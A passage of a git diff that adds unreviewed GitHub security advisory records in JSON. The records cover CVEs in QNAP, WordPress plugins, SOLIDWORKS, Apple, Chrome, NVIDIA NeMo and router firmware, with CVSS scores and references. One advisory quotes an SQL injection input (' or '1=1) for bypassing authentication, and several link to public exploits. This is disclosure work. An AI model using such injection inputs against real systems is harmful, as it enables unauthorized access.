"2026-02-11T21:30:39Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-48724" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48724" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json new file mode 100644 index 0000000000000..7321ce7053113 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj9g-q4j9-47hp", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2112" + ], + "details": "The Dam Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing nonce verification on the pending comment deletion action in the cleanup page. This makes it possible for unauthenticated attackers to delete all pending comments via a forged request granted they can trick an admin into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2112" + }, + { + "type": "WEB", + "url": "https://github.com/webguyio/dam-spam/blob/52e12fb455e7b670af2e0713f9da84d2d1d309ac/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dam-spam/tags/1.0.6/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dam-spam/trunk/settings/cleanup.php#L92" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3457369%40dam-spam&new=3457369%40dam-spam&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e336dc27-4a76-4197-929c-b221f42bfe69?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjg6-3whf-x8q9/GHSA-qjg6-3whf-x8q9.json b/advisories/unreviewed/2026/02/GHSA-qjg6-3whf-x8q9/GHSA-qjg6-3whf-x8q9.json new file mode 100644 index 0000000000000..6dfeb840ac05c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qjg6-3whf-x8q9/GHSA-qjg6-3whf-x8q9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qjg6-3whf-x8q9", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25346" + ], + "details": "TheSystem 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating the 'server_name' parameter. Attackers can inject malicious SQL code like ' or '1=1 to retrieve unauthorized database records and potentially access sensitive system information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25346" + }, + { + "type": "WEB", + "url": "https://github.com/kostasmitroglou/thesystem" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47430" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/thesystem-servername-sql-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjmh-gf3w-643f/GHSA-qjmh-gf3w-643f.json b/advisories/unreviewed/2026/02/GHSA-qjmh-gf3w-643f/GHSA-qjmh-gf3w-643f.json new file mode 100644 index 0000000000000..54c6a7d08d76d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qjmh-gf3w-643f/GHSA-qjmh-gf3w-643f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qjmh-gf3w-643f", + "modified": "2026-02-16T15:32:47Z", + "published": "2026-02-16T15:32:47Z", + "aliases": [ + "CVE-2026-1335" + ], + "details": "An Out-Of-Bounds Write vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1335" + }, + { + "type": "WEB", + "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2026-1335" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T14:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json b/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json new file mode 100644 index 0000000000000..b2437c4726c2d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qjq9-mpcc-f8cr/GHSA-qjq9-mpcc-f8cr.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qjq9-mpcc-f8cr", + "modified": "2026-02-12T21:31:26Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20677" + ], + "details": "A race condition was addressed with improved handling of symbolic links. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. A shortcut may be able to bypass sandbox restrictions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20677" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362", + "CWE-367" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qm6w-97m7-3844/GHSA-qm6w-97m7-3844.json b/advisories/unreviewed/2026/02/GHSA-qm6w-97m7-3844/GHSA-qm6w-97m7-3844.json new file mode 100644 index 0000000000000..665e17149137c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qm6w-97m7-3844/GHSA-qm6w-97m7-3844.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qm6w-97m7-3844", + "modified": "2026-02-14T00:32:42Z", + "published": "2026-02-14T00:32:42Z", + "aliases": [ + "CVE-2025-15157" + ], + "details": "The Starfish Review Generation & Marketing for WordPress plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'srm_restore_options_defaults' function in all versions up to, and including, 3.1.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15157" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/starfish-reviews/tags/3.1.18/init/actions/ajax/starfish-ajax-callbacks.action.php#L46" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/064e7ea2-949e-4f5b-adba-0890f8c6ad25?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T22:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qmpj-cvwj-r2m8/GHSA-qmpj-cvwj-r2m8.json b/advisories/unreviewed/2026/02/GHSA-qmpj-cvwj-r2m8/GHSA-qmpj-cvwj-r2m8.json new file mode 100644 index 0000000000000..2e8660325b82b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qmpj-cvwj-r2m8/GHSA-qmpj-cvwj-r2m8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qmpj-cvwj-r2m8", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25394" + ], + "details": "Missing Authorization vulnerability in sparklewpthemes Fitness FSE fitness-fse allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fitness FSE: from n/a through <= 1.0.6.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25394" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/fitness-fse/vulnerability/wordpress-fitness-fse-theme-1-0-6-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qp2f-j6qh-vgqx/GHSA-qp2f-j6qh-vgqx.json b/advisories/unreviewed/2026/02/GHSA-qp2f-j6qh-vgqx/GHSA-qp2f-j6qh-vgqx.json new file mode 100644 index 0000000000000..af6f8851bae64 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qp2f-j6qh-vgqx/GHSA-qp2f-j6qh-vgqx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qp2f-j6qh-vgqx", + "modified": "2026-02-14T09:31:32Z", + "published": "2026-02-14T09:31:32Z", + "aliases": [ + "CVE-2025-15483" + ], + "details": "The Link Hopper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘hop_name’ parameter in all versions up to, and including, 2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15483" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/link-hopper/trunk/linkhopper.php#L205" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c6c52046-c85d-46af-b36c-41c70dad5426?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json b/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json new file mode 100644 index 0000000000000..32a00258c2093 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qpc6-m6hf-x62g/GHSA-qpc6-m6hf-x62g.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpc6-m6hf-x62g", + "modified": "2026-02-16T18:31:28Z", + "published": "2026-02-16T18:31:28Z", + "aliases": [ + "CVE-2026-2563" + ], + "details": "A vulnerability was identified in JingDong JD Cloud Box AX6600 up to 4.5.1.r4533. Affected is the function set_stcreenen_deabled_status/get_status of the file /f/service/controlDevice of the component jdcapp_rpc. The manipulation leads to Remote Privilege Escalation. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2563" + }, + { + "type": "WEB", + "url": "https://my.feishu.cn/wiki/T3pjwxZtYiU4Gfkl6iUc3CzVnRe" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346170" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346170" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.750987" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.750992" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T16:19:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qpc7-wrgr-p3hh/GHSA-qpc7-wrgr-p3hh.json b/advisories/unreviewed/2026/02/GHSA-qpc7-wrgr-p3hh/GHSA-qpc7-wrgr-p3hh.json new file mode 100644 index 0000000000000..efa536400ecc6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qpc7-wrgr-p3hh/GHSA-qpc7-wrgr-p3hh.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpc7-wrgr-p3hh", + "modified": "2026-02-19T18:31:55Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-2817" + ], + "details": "Use of insecure directory in Spring Data Geode snapshot import extracts archives into predictable, permissive directories under the system temp location. On shared hosts, a local user with basic privileges can access another user’s extracted snapshot contents, leading to unintended exposure of cache data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2817" + }, + { + "type": "WEB", + "url": "https://www.herodevs.com/vulnerability-directory/cve-2026-2817" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-378" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:25:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qpgr-f49w-gfpx/GHSA-qpgr-f49w-gfpx.json b/advisories/unreviewed/2026/02/GHSA-qpgr-f49w-gfpx/GHSA-qpgr-f49w-gfpx.json new file mode 100644 index 0000000000000..ac84d92791603 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qpgr-f49w-gfpx/GHSA-qpgr-f49w-gfpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpgr-f49w-gfpx", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37189" + ], + "details": "TaskCanvas 1.4.0 contains a denial of service vulnerability in the registration code input field that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the registration field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37189" + }, + { + "type": "WEB", + "url": "https://www.digitalvolcano.co.uk" + }, + { + "type": "WEB", + "url": "https://www.digitalvolcano.co.uk/taskcanvasdownload.html" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47911" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/taskcanvas-registration-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json new file mode 100644 index 0000000000000..de9398f896eab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qph2-xm7h-wv73", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2576" + ], + "details": "The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2576" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/controllers/pages/class-checkout.php#L126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/db/class-db-query-set.php#L37" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463307/business-directory-plugin/trunk/includes/db/class-db-query-set.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8ec7d25-1574-416c-b5fd-3a71b1cc09d2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qphx-26ch-3x8j/GHSA-qphx-26ch-3x8j.json b/advisories/unreviewed/2026/02/GHSA-qphx-26ch-3x8j/GHSA-qphx-26ch-3x8j.json new file mode 100644 index 0000000000000..26ade75f2e43e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qphx-26ch-3x8j/GHSA-qphx-26ch-3x8j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qphx-26ch-3x8j", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-2344" + ], + "details": "A vulnerability in Plunet Plunet BusinessManager allows unauthorized actions being performed on behalf of privileged users.This issue affects Plunet BusinessManager: 10.15.1", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2344" + }, + { + "type": "WEB", + "url": "https://cds.thalesgroup.com/en/tcs-cert/CVE-2026-2344" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qpmp-894x-mvrq/GHSA-qpmp-894x-mvrq.json b/advisories/unreviewed/2026/02/GHSA-qpmp-894x-mvrq/GHSA-qpmp-894x-mvrq.json new file mode 100644 index 0000000000000..20cce662b2c32 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qpmp-894x-mvrq/GHSA-qpmp-894x-mvrq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpmp-894x-mvrq", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25418" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in bitpressadmin Bit Form bit-form allows SQL Injection.This issue affects Bit Form: from n/a through <= 2.21.10.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25418" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bit-form/vulnerability/wordpress-bit-form-plugin-2-21-10-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qprx-jf5f-fhhx/GHSA-qprx-jf5f-fhhx.json b/advisories/unreviewed/2026/02/GHSA-qprx-jf5f-fhhx/GHSA-qprx-jf5f-fhhx.json new file mode 100644 index 0000000000000..26ccd508535e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qprx-jf5f-fhhx/GHSA-qprx-jf5f-fhhx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qprx-jf5f-fhhx", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2322" + ], + "details": "Inappropriate implementation in File input in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2322" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/470928605" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json new file mode 100644 index 0000000000000..8039ad0742203 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq2v-q6qr-p5vx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33251" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33251" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33251" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json b/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json new file mode 100644 index 0000000000000..8927f9ccb0619 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq3h-f6g7-3484/GHSA-qq3h-f6g7-3484.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq3h-f6g7-3484", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-64074" + ], + "details": "A path-traversal vulnerability in the logout functionality of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to delete arbitrary files on the host by supplying a crafted session cookie value.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64074" + }, + { + "type": "WEB", + "url": "https://neutsec.io/advisories/cve-2025-64074" + }, + { + "type": "WEB", + "url": "https://www.zbtwifi.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git 